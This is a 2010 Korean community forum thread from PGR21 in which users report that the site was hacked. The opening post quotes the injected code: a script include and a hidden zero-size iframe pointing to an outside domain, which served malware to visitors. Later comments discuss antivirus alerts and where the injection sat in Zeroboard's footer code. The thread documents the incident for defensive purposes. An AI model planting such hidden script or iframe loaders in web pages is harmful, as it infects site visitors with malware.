PGR21.com
- 자유 주제로 사용할 수 있는 게시판입니다.
- 토론 게시판의 용도를 겸합니다.
Date 2010/09/25 00:47:00
Name EZrock
Subject [일반] pgr은 왜 이렇게도 쉽게 뚫리는 걸까요-_-;;;
<script language=javascript src=http://69bar.net/js.js></script>

document.writeln("<iframe src=http://69bar.net/faq.htm width=0 height=0 scrolling=no frameborder=0></iframe>");


원인이 되는 페이지의 소스코드와(라인 7463) 그 안의 스크립트 내용입니다.

저번에는 원래 포함되어 있을 .js 파일내부에 문구가 삽입되어 있다면

이번엔 대놓고 스크립트가 실행되어야 할 부분이 직접적으로 들어가 있네요

저야 웹 보안과 크래킹 쪽은 관심이 크게 없어서 어떤 기법으로 이런 녀석들이 삽입됐는지 모르겠는데...

이 참에 웹 보안과 크래킹 쪽에 대해 관심이 생기네요.

일단은 제가 쓰는 Avast에서 걸리는건 이 부분 밖에 없어서 이 부분만 제거하면 좀 괜찮아 질지 모르겠습니다만...

포모스도 그렇고 pgr도 그렇고 너무 쉽게 어택을 허용하는 느낌이 드네요...

통합규정 1.3 이용안내 인용

"Pgr은 '명문화된 삭제규정'이 반드시 필요하지 않은 분을 환영합니다.
법 없이도 사는 사람, 남에게 상처를 주지 않으면서 같이 이야기 나눌 수 있는 분이면 좋겠습니다."
핸드레이크
10/09/25 00:59
수정 아이콘
저야 잘 모르는 부분인데 저게 무슨 문제를 일으키는 건가요?

크롬으로 들어갔을때 막히지나 않았으면 좋겠는데..
실버벨
10/09/25 01:04
수정 아이콘
저도 지금은 크롬으로 접속 중인데, IE로 접속하면 자꾸 바이러스 잡힌다고 더 이상 진행이 안 되서.. T-T.
Aeternus
10/09/25 01:04
수정 아이콘
어쩐지 그래서 아까 한동안 심하게 느렸었네요..;; 주소줄에 이상한 주소가 뜨길래 제한된 사이트로 차단하고
접속하니 별 문제 없어서..
지니쏠
10/09/25 01:06
수정 아이콘
피지알접하면 오류메시지 뜨면서 꺼지는데 그래서 그런건가요? [m]
10/09/25 01:08
수정 아이콘
저도 자꾸 그런 오류 뜨네요... 네이버 백신에선 자꾸 바이러스 잡히구요.
10/09/25 01:05
수정 아이콘
일단 저 스크립트 실행되면 저 페이지로 강제접속되고 거기서 개인 컴퓨터로 악성코드를 전송시켜버리는 녀석...이라고 밖에 제 짧은 지식으론 답변 드릴수가 없네요-_-)a;;;
10/09/25 01:16
수정 아이콘
제로보드 기반이라 보안에 많이 취약합니다.
저런 해킹의 스크립트가 서버에 박히는거는 꾸준한 모니터링 뿐이 없습니다.
영리를 목적으로 하는 기업형 사이트가 아닌 개인 사이트의 성격이 짙은 pgr에
일일히 시스템적 부분을 관리, OMS 하기에는 한계가 있죠
하수태란
10/09/25 01:16
수정 아이콘
역시나 V3은 쓰레기인것인가요 ㅡㅡ; 바이러스 경고 하나도 못잡네요

2007년이었나. 학교로 공격들어왔을때 카스퍼스키 설치해둔 제 컴퓨터만 무사했고
학교 라이센스 V3 이 깔린 다른 컴퓨터들은 다 퍼졌는데.

옥션에서 그냥 준 V3로 집에것 쓰고 있는데. 어떤 악성코드가 깔려있을까 걱정됩니다.
10/09/25 01:23
수정 아이콘
제로보드4 lib.php에 보면 function foot() { 부분이 있습니다.
여기를 살펴보면 게시판 설정화면에서 입력하는 footer를 먼저 출력하게 되어 있는데 그 내용이 </div> 뿐이고, 그 뒤에 바로 악성코드 스크립트가 붙어 나오네요.
그 다음엔 footer 파일 경로에서 지정한 footer 파일을 불러오게 되어있는데, 그 내용은 악성코드 스크립트 뒤로 따라 붙어 나옵니다.

설정푸터와 파일푸터 사이에 어디선가 악성코드를 끼워넣어주고 있는건데, DB상에 숨어 있거나... JS로 동적으로 넣어주고 있다고 봐야 할 것 같네요.

그럼.... 어디를 살펴보면 될까요?

아시는 분은 알려주세요 흠흠
10/09/25 01:40
수정 아이콘
와우 제거되니 속이 시원하네요 크크크크크
KillerCrossOver
10/09/25 07:02
수정 아이콘
아 이제 해결된건가요..ㅠㅠ

며칠간 추석이라 뜸하기도 했었지만, 광고오류랑 이 오류문제로 접속이 힘들었는데..
해결되서 다행입니다. 찾아내고 수정해주신 분들..고생하셨습니다. (__)
뱃살토스
10/09/27 12:19
수정 아이콘
요즘 접속이 원활하지가 않더군요.. 해결하신분들 수고많으셨습니다.
목록 삭게로! 맨위로
번호 제목 이름 날짜 조회 추천
25343 [일반] 2010 마구마구 프로야구 중계 불판 [72] EZrock3435 10/09/25 3435 0
25342 [일반] MBC 스페셜 < 타블로, 스탠퍼드 가다! > [14] wonderswan7908 10/09/25 7908 0
25339 [일반] 필드게임과 멀티깍두기 [9] 설탕가루인형4047 10/09/25 4047 1
25338 [일반] 트윗질에 빠지면 [2] 루미큐브4322 10/09/25 4322 0
25336 [일반] 한 아주머니의 절규 [9] 나이로비블랙라벨5164 10/09/25 5164 0
25335 [일반] 이번 연휴에 영웅호걸을 정주행했습니다 [6] 강가딘4300 10/09/25 4300 0
25334 [일반] 글에 관해서 이야기해볼게요. [255] 엘푸아빠8619 10/09/25 8619 1
25333 [일반] 슈퍼스타 K 관련 글이 너무 많다는 생각 안 드세요? [56] sungsik9243 10/09/25 9243 15
25332 [일반] 슈퍼스타K2. Top8의 나름대로의 평가. [13] 거룩한황제5135 10/09/25 5135 0
25331 [일반] 네이버 거리뷰. [6] 삭제됨5780 10/09/25 5780 0
25330 [일반] 슈퍼스타K 2 - 10년 9월 24일 이야기 [8] 행복한 날들4053 10/09/25 4053 0
25329 [일반] 내멋대로 슈스케2의 평가와 감상기... [87] 분노의노지심5757 10/09/25 5757 1
25328 [일반] 슈퍼스타k2에서 요구하는 변신, 색다름에 대한 생각. [9] legend3363 10/09/25 3363 0
25327 [일반] 슈퍼스타k2, 오늘의 히어로 (2) [46] 풍경6177 10/09/25 6177 0
25326 [일반] 기적? 문자를 노래하라! 슈퍼스타k2 , 오늘의 감상평 [45] 정용현5403 10/09/25 5403 0
25325 [일반] 슈퍼스타K 2 3주차 TOP 6 인터넷 사전 투표 (25일 AM 1:45분 수정) 상황~! [65] CrazY_BoY5214 10/09/25 5214 0
25324 [일반] pgr은 왜 이렇게도 쉽게 뚫리는 걸까요-_-;;; [14] EZrock5986 10/09/25 5986 0
25323 [일반] 기적을 노래하라! 슈퍼스타 K 시즌 2 - 생방송 2일차 불판 #3 [516] kimbilly17963 10/09/25 17963 0
25322 [일반] 2010 마구마구 프로야구 9/24(금) 리뷰 & 9/25(토) 프리뷰 [8] 멀면 벙커링3297 10/09/25 3297 0
25321 [일반] 기적을 노래하라! 슈퍼스타 K 시즌 2 - 생방송 2일차 불판 #2 [358] kimbilly13090 10/09/25 13090 0
25320 [일반] 버, 버틸 수가 없는 게임?(+주문하려고 합니다.) [23] 빼꼼후다닥5810 10/09/24 5810 0
25319 [일반] 결국 일본이 항복했네요 [17] 주환7568 10/09/24 7568 0
25318 [일반] 기적을 노래하라! 슈퍼스타 K 시즌 2 - 생방송 2일차 불판 #1 [173] kimbilly9520 10/09/24 9520 0
목록 이전 다음
댓글

+ : 최근 1시간내에 달린 댓글
+ : 최근 2시간내에 달린 댓글
맨 위로